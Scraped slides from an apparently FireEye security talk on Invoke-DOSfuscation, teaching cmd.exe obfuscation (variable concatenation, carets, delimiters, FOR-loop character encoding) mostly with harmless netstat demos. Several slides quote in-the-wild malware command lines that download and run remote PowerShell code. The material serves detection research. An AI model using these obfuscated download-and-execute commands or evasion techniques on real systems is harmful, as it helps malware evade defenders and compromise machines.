• /V
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 131: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/131.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
131
• Steps for unpaired quotes
1. Double up quotes
2. Set quotes in env var
3. Char substitution
4. Variable expansion
• /V:ON
• /V:O
• /V:
• /V
• /VISTA
• /VM
• /V*
Payload Obfuscation 1 of 4: Concatenation
https://pbs.twimg.com/media/DHCh2GvWAAUevcd.jpg:large
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 132: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/132.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ co^M3=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^cO^m2=^s^^ta^^t)&&(;(;;s^eT^ ^ C^oM1^=^n""^^e""t) ) &&set quotes=""&&, ((
;c^aLl,^;,S^e^T ^ ^ fi^NAl^=^%COm1^%%c^Om2%^%c^oM3^%))&&; (, ,(c^AlL^, ;,^
;%Fi^nAl^:""=!quotes:~0,1!%) ) "
132
• Env var names can be:
1.
2.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 133: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/133.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ --$#$--=^^ /^^an^o)) )))&&,,(,S^Et^ ^
^!!#**#!!=^s^^ta^^t)&&(;(;;s^eT^ ^ ……...=^n""^^e""t) ) &&set ;;;;;;;;;=""&&, ((
;c^aLl,^;,S^e^T ^ ^ '''''''''''''''=^%……...%%!!#**#!!%^%--$#$--%))&&; (, ,(c^AlL^, ;,^
;%''''''''''''''':""=!;;;;;;;;;:~0,1!%) ) "
133
• Env var names can be:
1. Special characters
2.
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 134: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/134.jpg)
• ;,,C^Md^,; /VISTA ,^/^C^ ^ ", ( ((;,( ;(s^Et ^ ^ ' =^^ /^^an^o)) )))&&,,(,S^Et^ ^ ^'
=^s^^ta^^t)&&(;(;;s^eT^ ^ ' =^n""^^e""t) ) &&set ' =""&&, (( ;c^aLl,^;,S^e^T ^ ^ '
=^%' %%' %^%' %))&&; (, ,(c^AlL^, ;,^ ;%' :""=!' :~0,1!%) ) "
134
• Env var names can be:
1. Special characters
2. Whitespace
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 135: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/135.jpg)
135
https://i.imgflip.com/rjkyg.jpg
Payload Obfuscation 1 of 4: Concatenation
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 136: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/136.jpg)
• Concatenation examples in the wild (1/3):
136
..\..\..\..\Windows\System32\cmd.exe /c "set da=wersh&& set gg=ell&& set
c0=po&&" cmd /c %c0%%da%%gg% -nonI -eP bypass -c iEx ((n`eW-OBjECt
('n'+'Et.w'+'EbclIe'+'nT')).('do'+'wNlo'+'adst'+'ring').Invoke(('h'+$s4+'t'+'t'+$o8
+'ps://'+…
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 1/3)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 137: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/137.jpg)
• Concatenation examples in the wild (2/3):
137
CmD wMic & %Co^m^S^p^Ec^% /V /c set
%binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set
%zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set
%GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set
%jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiP
PcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. (
ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL)
Invoke-Obfuscation payload
Payload Obfuscation 1 of 4: Concatenation (ITW 2/3)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 138: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/138.jpg)
• Concatenation examples in the wild (3/3):
138
cmd.exe /C "cm^d^.^e^x^e /V^ ^/C s^et g^c^=^er^s^&^&s^e^t
^tf=^he^ll^&^&set^ f^a^=^pow^&^&^s^et^
dq^=W^i^n^do^ws^!fa^!^!g^c^!!^t^f^!\^v^1^.0\^!^fa!^!^gc!!^tf^!^&^&^
ech^o^ iE^X^(^^"iex(neW-OBjecT
nEt.webCLiEnt).dowNlOaDstrING('https://REDACTED')^"^)^;^ ^|^
!dq! -^no^p^ ^-^w^i^n^ ^1^ ^-"
!dq! == WindowsPowerShell\v1.0\powershell
Payload Obfuscation 1 of 4: Concatenation (ITW 3/3)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 139: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/139.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.139
https://f.fwallpapers.com/images/funny-bear.jpg
Last of ITW…
Unseen Techniques
Up Ahead!
![Page 140: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/140.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.140
https://f.fwallpapers.com/images/funny-bear.jpg
Last of ITW…
Unseen Techniques
Up Ahead!
For the past 9 months I have
hunted across:
• Public file repositories
• Private file repositories
• Sandbox execution reports
• Endpoint detections for 10+
million endpoints
![Page 141: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/141.jpg)
141
FOR Score And Seven Obfuscation Techniques Ago…
https://www.whitehouse.gov/sites/whitehouse.gov/files/images/first-family/16_abraham_lincoln%5B1%5D.jpg
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 142: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/142.jpg)
142
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 143: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/143.jpg)
143
• cmd /c netstat /ano
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 144: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/144.jpg)
144
• cmd /v /c netstat /ano
• /V
• /V:ON
• /VERBOSE
• /V:::::::::::
• /V=====
• /V_-/\-_
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 145: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/145.jpg)
145
• cmd /v /c netstat /ano
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 146: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/146.jpg)
146
• cmd /v /c netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 147: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/147.jpg)
147
• cmd /v /c netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 148: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/148.jpg)
148
• cmd /v /r netstat /ano
#ForCompatibilityReasons #RisthenewC
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 149: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/149.jpg)
149
• cmd /v /r netstat /ano
https://s3.caradvice.com.au/thumb/1200/630/wp-
content/uploads/2014/01/ownerreview-honda-cr-v.jpg
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 150: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/150.jpg)
150
• cmd /v /r netstat /ano
Troll-pportunity ™
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 151: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/151.jpg)
151
• cmd Never Gonna Give You Up/vNever Gonna Let You Down/r netstat /ano
https://postmediavancouversun2.files.wordpress.com/2016/10/giphy.gif
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 152: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/152.jpg)
152
• cmd \c echo %PATH%
/v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 153: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/153.jpg)
153
• cmd \c echo %PATH%
/v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 154: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/154.jpg)
154
• cmd \c echo %PATH%
/v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 155: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/155.jpg)
155
• cmd /v /r netstat /ano
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 156: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/156.jpg)
156
• cmd /v /r "set unique=nets /ao&&…"
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 157: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/157.jpg)
157
• cmd /v /r "set unique=nets /ao&&FOR %A IN ( ) DO…"
n e t s / a o
0 1 2 3 4 5 6 7
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 158: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/158.jpg)
158
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 159: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/159.jpg)
159
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 160: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/160.jpg)
160
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 161: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/161.jpg)
161
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 ) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t s t a t / a n o
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 162: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/162.jpg)
162
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO…"
Payload Obfuscation 2 of 4: FORcoding
n e t s / a o
0 1 2 3 4 5 6 7
n e t s t a t / a n o
Arbitrary
end-of-index
delimiter
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 163: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/163.jpg)
163
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&…"
Appending char at
each index (%A)
to !final! env var.
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 164: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/164.jpg)
164
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
• ==1337
• EQU 1337
• GEQ 1337
• GTR 1336
https://ss64.com/nt/if.html
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 165: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/165.jpg)
165
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 166: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/166.jpg)
166
• cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13
1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-
12%"
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 167: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/167.jpg)
167
• cmd /v /r "set unique=OnBeFtUsS C/AaToE&&FOR %A IN (1 3 5 7 5 13 5 9 11 13
1 15 1337) DO set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-
12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 168: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/168.jpg)
168
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1 3 5 7 5 13 5 9 11 13
1 15 1337) dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-
12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
•
•
•
•
•
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 169: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/169.jpg)
169
• cMd/v/R"sET unIQuE=OnBeFtUsS C/AaToE&&foR %a iN (1,3;5,7;5,13;5,9;11,
13,1;15,1337)dO sEt fINal=!finAl!!uniQue:~%a,1!&&iF %a==1337 CalL %fInAl:~-
12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
•
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 170: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/170.jpg)
170
• cMd /v /R "sET unIQuE=OnBeFtUsS C/AaToE && foR %a iN ( 1 3
5 7 5 13 5 9 11 13 1 15 1337 ) dO sEt fINal=!finAl!!uniQue:~ %a,
1!&& iF %a == 1337 CalL %fInAl:~ -12% "
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
•
•
•
•
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 171: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/171.jpg)
171
• ,;cMd;/v;,;/R "sET unIQuE=OnBeFtUsS C/AaToE &&,; foR ;,;%a ,;;iN;,,;( , 1; 3
5 7 5 13 5,,9 11 13 1;;15 1337;,),;,;dO,,;;sEt fINal=!finAl!!uniQue:~ %a,
1!&&;;;iF,, ,%a;;,==,,;1337,;;,CalL;,,;%fInAl:~ -12% "
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
•
•
•
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 172: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/172.jpg)
172
• ,;c^Md;/^v;,;/^R "sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE &&,; fo^R;,;%^a,;;
i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,;;s^Et
fI^Nal=!finAl!!uni^Que:~ %^a, 1!&&;;i^F,,%^a;,=^=,;13^37,;Ca^lL;,%fIn^Al:~ -^12%"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
•
•
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 173: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/173.jpg)
173
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;;
i^N;,,;( , 1; 3 5 7 5 1^3 5,,9 11 1^3 1;;15 ^ 13^37;,),;,;d^O,,(;(;s^Et
fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a,=^=;13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
•
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 174: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/174.jpg)
174
• ,;c^Md;/^v;,;/^R "((sE^T ^ unIQ^uE=OnBeFt^UsS C/AaToE ))&&,; fo^R;,;%^a,;;
i^N;,,;( ,+1; 3 5 7 +5 1^3 +5,,9 11 +1^3 +1;;+15 ^+13^37;,),;,;d^O,,(;(;s^Et
fI^Nal=!finAl!!uni^Que:~ %^a,1!))&&(;i^F,%^a=^=+13^37,(Ca^lL;%fIn^Al:~ -^12%))"
Invoke-DOSfuscation functions also
wrap all the building block techniques
into each input command…
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
• Parentheses
• Explicit signing
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 175: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/175.jpg)
175
Troll-pportunity ™
Payload Obfuscation 2 of 4: FORcoding
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 176: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/176.jpg)
• cmd /v /r "set reverse=ona/ tatsten&&FOR /L %A IN (11 -1 0) DO set
final=!final!!reverse:~%A,1!&&IF %A==0 CALL %final:~-12%"
• cmd /v /r "set unique=nets /ao&&FOR %A IN (0 1 2 3 2 6 2 4 5 6 0 7 1337) DO
set final=!final!!unique:~%A,1!&&IF %A==1337 CALL %final:~-12%"
176
FORcoding
